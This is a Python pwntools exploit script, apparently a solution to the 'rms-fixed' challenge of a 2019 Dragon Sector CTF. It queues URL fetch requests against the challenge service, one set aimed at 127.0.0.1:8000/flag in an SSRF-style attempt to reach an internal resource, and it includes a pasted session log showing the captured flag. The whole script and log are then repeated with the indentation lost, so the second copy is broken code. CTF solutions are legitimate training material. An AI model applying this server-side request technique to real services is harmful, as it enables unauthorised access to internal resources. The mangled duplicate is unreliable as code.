l4wio/dsctf_exploit_rms-fixed.py

## dsctf_exploit_rms-fixed.py
from pwn import *

r = remote("rms-fixed.hackable.software",1337)

def add_url(url):
    r.recvuntil('Choice')
    r.sendline("a")
    r.recvuntil("url?")
    r.sendline(url)


def view_request(idx):
    r.recvuntil('Choice')
    r.sendline("v")
    r.recvuntil("request id?")
    r.sendline(str(idx))
    data = r.recvuntil("What do?")
    return data

raw_input("?")


target = "http://google.com:8000/flag"


for i in range(5):
    add_url(target)
for i in range(2):
    add_url("http://127.0.0.1:8000/flag")


r.interactive()

"""
Choice? [pfvaq] $ f                                                                                                                                                                           Done:                                                                                                                                                                                             [5] FAIL: localhost not allowed
    [6] FAIL: localhost not allowed
    [0] OK, HTTP/1.0 200 OK
    [1] OK, HTTP/1.0 200 OK
    [2] OK, HTTP/1.0 200 OK
    [3] OK, HTTP/1.0 200 OK
    [4] OK, HTTP/1.0 200 OK
What do?
    list [p]ending requests
    list [f]inished requests
    [v]iew result of request
    [a]dd new request
    [q]uit
Choice? [pfvaq] $ v                                                                                                                                                                           request id? $ 0                                                                                                                                                                               [0] Response, 121 bytes:                                                                                                                                                                      HTTP/1.0 200 OK                                                                                                                                                                               Server: BaseHTTP/0.3 Python/2.7.15+
Date: Sun, 22 Sep 2019 13:57:04 GMT

DrgnS{e9759caf4f2d2b69773c}


What do?
    list [p]ending requests
    list [f]inished requests
    [v]iew result of request
    [a]dd new request
    [q]uit
Choice? [pfvaq] $
"""
	from pwn import *

	r = remote("rms-fixed.hackable.software",1337)

	def add_url(url):
	r.recvuntil('Choice')
	r.sendline("a")
	r.recvuntil("url?")
	r.sendline(url)


	def view_request(idx):
	r.recvuntil('Choice')
	r.sendline("v")
	r.recvuntil("request id?")
	r.sendline(str(idx))
	data = r.recvuntil("What do?")
	return data

	raw_input("?")


	target = "http://google.com:8000/flag"


	for i in range(5):
	add_url(target)
	for i in range(2):
	add_url("http://127.0.0.1:8000/flag")


	r.interactive()

	"""
	Choice? [pfvaq] $ f Done: [5] FAIL: localhost not allowed
	[6] FAIL: localhost not allowed
	[0] OK, HTTP/1.0 200 OK
	[1] OK, HTTP/1.0 200 OK
	[2] OK, HTTP/1.0 200 OK
	[3] OK, HTTP/1.0 200 OK
	[4] OK, HTTP/1.0 200 OK
	What do?
	list [p]ending requests
	list [f]inished requests
	[v]iew result of request
	[a]dd new request
	[q]uit
	Choice? [pfvaq] $ v request id? $ 0 [0] Response, 121 bytes: HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.15+
	Date: Sun, 22 Sep 2019 13:57:04 GMT

	DrgnS{e9759caf4f2d2b69773c}


	What do?
	list [p]ending requests
	list [f]inished requests
	[v]iew result of request
	[a]dd new request
	[q]uit
	Choice? [pfvaq] $
	"""